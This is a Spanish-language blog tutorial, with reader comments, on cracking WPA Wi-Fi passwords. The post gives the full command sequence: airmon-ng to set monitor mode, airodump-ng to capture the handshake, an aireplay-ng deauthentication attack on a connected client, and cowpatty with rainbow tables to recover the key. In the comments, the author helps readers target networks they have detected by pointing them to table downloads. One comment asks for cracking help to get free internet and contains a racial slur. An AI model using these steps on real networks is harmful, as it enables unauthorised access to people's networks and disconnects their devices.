Como Crackear una WPA con Rainbows Tables
Bueno el primer procesdimiento es mirar como se llama nuestra tarjeta de red inalambrica con el siguiente comando
#iwconfig
En la imagen anterior podemos ver el nombre de mi tarjeta de red inlambrica es wlan0
ahora lo pondremos la tarjeta en modo monitor con los siguintes dos comandos
#airmon-ng stop wlan0
#airmon-ng start wlan0
Debe aparecer algo similar como en la imagen anterior
ahora vamos a escanear las redes que estan a nuestro alcance
#airodum-ng wlan0
En la imagen anterior podemos ver que a nuestro alcance hay un red wireles que tiene un tipo de encriptacion WPA-TKIP vamos anotar la MAC (BSSID) el nombre (ESSID) y el canal (CH)
Ahora usaremos airodum-ng para capturar el handshake
#airodump-ng –c 1 –bssid 00:A0:56:9A:18:FB –w prueba wlan0
Como vemos en la imagen anterior vemos que en el AP hay un cliente asociado entonces vamos hacerle una desautenticacion al cliente que tiene conectado para nosotros poder capturar el handshake
#aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0
En la parte superior de la imagen vemos que obtuvimos el handshake
Ahora procedemos a crackear la contraseña con el siguiente comando
#cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson
En la imagen anterior podemos ver la velocidad de crackeo de una red con WPA y la password es JONATHAN
NOTA:
Para poder crackear la contraseña el SSID debe de ser el mismo de las Rainbows Tables me explico si el SSID es por ejemplo thomson y en las Rainbows Tables es Thomson no puede descifrar la contraseña.
En el siguinte link pueden descargar las Rainbows Tables y encontrar mas información
http://hak5.org/forums/index.php?showtopic=12708%3Cbr%3E
Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.
septiembre 26, 2009 a 1:05 am
Buen post, ahora solo necesitamos un cluster para precomputar unos SSIDs colombianos 😉
abril 8, 2010 a 7:41 am
hola tengo un problema empezado a intalar el programa batrark perdona por omerme letras pero estoy on el virtual linux q es donde lo tengo y no me deja esribir esa letra espero q lo entiendas mi problema es q pongo el primer omando y no me reonoe mi tarjeta Atheros AR 9285 eh busado en todos los foros pero nadie sabe nada a ver si me puedes deir a ver omo haer para q la reonoza o algo porq me estoy volviendo loa puede ser porq esta metido en un virtual el programa o porq linux no tiene los drivers a ver si me puedes dar alguna idea por favor
abril 10, 2010 a 8:40 am
Hola si tienes una atheros en usb podes usar la maquina virtual pero si es PCI o PCI E tenes que iniciar linux desde tu maquina real y si tu linux que iniciastes no tiene instalado el driver entonces te paso el link para que tu lo instales
http://linuxwireless.org/en/users/Drivers/ath9k
Lo que tengo entendido es que apartir del kernel 2.6.29 tiene soporte para esta tarjeta cuando instales esto ya podras seguir el manual de como romper una red wifi.
Espero que te sirva si tienes alguna duda comentas.
abril 10, 2010 a 3:39 pm
hola gracias la verda q se bastante poco de todo esto voy a seguir leyendo cosas porq tube q desistalar todo ya q no lo consguia y ademas soy super principiante en linux no tengo ni idea de como se instala los drivers ya te comentare gracias por tu respuesta ya q eres el unico q me a dicho algo porq sobre mi problema mucha gente pregunta pero nadie dice nada
abril 10, 2010 a 5:07 pm
hola me da un error me gustaria mandarte una foto porq es q ya no se q puedo hacer a ver si me puedes ayudar por favor
abril 11, 2010 a 3:31 pm
hola sigo tiendo problemas consigo q me deje conectarme a mi linea en linux pero no me dice el nombre de mi tarjeta me sale esto a ver si me puedes ayudar por favor
eth0 Link encap:Ethernet HWaddr 08:00:27:ea:b9:d7
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feea:b9d7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4295 errors:56 dropped:0 overruns:0 frame:0
TX packets:1583 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5980675 (5.9 MB) TX bytes:117976 (117.9 KB)
Interrupt:10 Base address:0xd020
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:200 (200.0 B) TX bytes:200 (200.0 B)
root@bt:~# idconfig
bash: idconfig: command not found
root@bt:~# idd
bash: idd: command not found
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
root@bt:~# airmon-ng stop ath0
Interface Chipset Driver
root@bt:~# airmon-ng start ath0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
4954 dhclient
Interface Chipset Driver
root@bt:~#
abril 12, 2010 a 11:45 am
Descargate el dvd de bactrack 4 final desde la siguinte url
http://www.backtrack-linux.org/download.php?fname=bt4f
y lo inicias en livedvd y pruebas si tiene el driver incluido
si tienes alguna duda comenta.
abril 26, 2010 a 1:39 am
hola tengo una duda podras explicar de donde sacaste lo siguiente
#cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson
-r seria nombre donde se capturan los archivos
-s es el essid sino me equivoco
pero
-d EN ESTA ES NOSE DE DONDE LO SACAS
abril 26, 2010 a 8:57 am
hola
la opcion -d es para especificar el directorio de las Rainbows Tables
May 7, 2010 a 8:06 pm
Hola amigo no entiendo eso de rainbows Tables me podrias exlicar un poco mas y como se que Rainbows Tables puedo descargar y de donde?
May 7, 2010 a 9:03 pm
Hola christian pues te paso un link donde puedes enterarte que es y como funciona.
http://en.wikipedia.org/wiki/Rainbow_table
May 8, 2010 a 8:23 am
Hola amigo y como se que Rainbow Table tengo que descargar a mi me detecta varias redes con TKIP pero la verdad ni idea de como sacar el password aver si me das una amito 🙂 con esto.
May 8, 2010 a 10:29 am
Puedes mirar el SSID de las redes inalambricas y con base a ese nombre se descarga la Rainbow table que necesita.
Ejemplo
Si detectas una red con un SSID NETGEAR te descargas esta Rainbow Table
http://www.megaupload.com/?d=R1BQTT1A
May 18, 2010 a 3:11 pm
Hola Amigos Disculpa por no aver respondido antes estuve ocupado estos dias pues mira te paso una imagen del scaneo de red y me dices cual Rainbow Table tengo que descargar 🙂 aqui la imagen
May 18, 2010 a 6:53 pm
Hola, viendo el pantallazo que me enviastes veo una red con SSID WIFI descargate esta table rainbows tables http://www.megaupload.com/?d=3SPD7D46
y una recomendacion es filtrar del pantallazo informacion sensible como es la direccion MAC, SSID.
May 18, 2010 a 8:02 pm
Y para el de Kevin no hay?
May 18, 2010 a 9:01 pm
noooooooooo
junio 28, 2010 a 9:22 am
waldoredes bro encontre el raimbows
pero dime #cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson
es la ubicacion de la rambor seria haci
#cowpatty -d /Escritorio/wap/Kevin -r prueba-01.cap -s Kevin
me supongo?
otra consulta sobre esto:
#aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0
y si esa red tiene varios cliente como se hace?
junio 28, 2010 a 2:05 pm
aireplay-ng -0 1 -a 00:02:6F:6C:9F:E9 -c 00:1B:11:20:F0:07 wlan0
14:04:23 Waiting for beacon frame (BSSID: 00:02:6F:6C:9F:E9) on channel 1
14:04:24 Sending 64 directed DeAuth. STMAC: [00:1B:11:20:F0:07] [ 0| 0 ACK
me sigue sin salir el handshake :S
CH 1 ][ Elapsed: 3 mins ][ 2010-06-28 14:05
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:02:6F:6C:9F:E9 -57 100 1570 556 0 1 11 . WPA TKIP PSK K
BSSID STATION PWR Rate Lost Packets Probes
00:02:6F:6C:9F:E9 00:1B:11:20:F0:07 -91 11 – 1 0 1
julio 29, 2010 a 1:44 pm
[…] Ataque WPA Rainbows Tables […]
octubre 24, 2012 a 4:07 pm
Hola negro inmundo no he podido hackear una WPA2-psk
y necesito internet.. enseñame enviame un correo con el manuel y con un diccionario full. para hacerlo en el bactrack.
enero 1, 2013 a 3:11 pm
It’s amazing in favor of me to have a site, which is useful in support of my know-how. thanks admin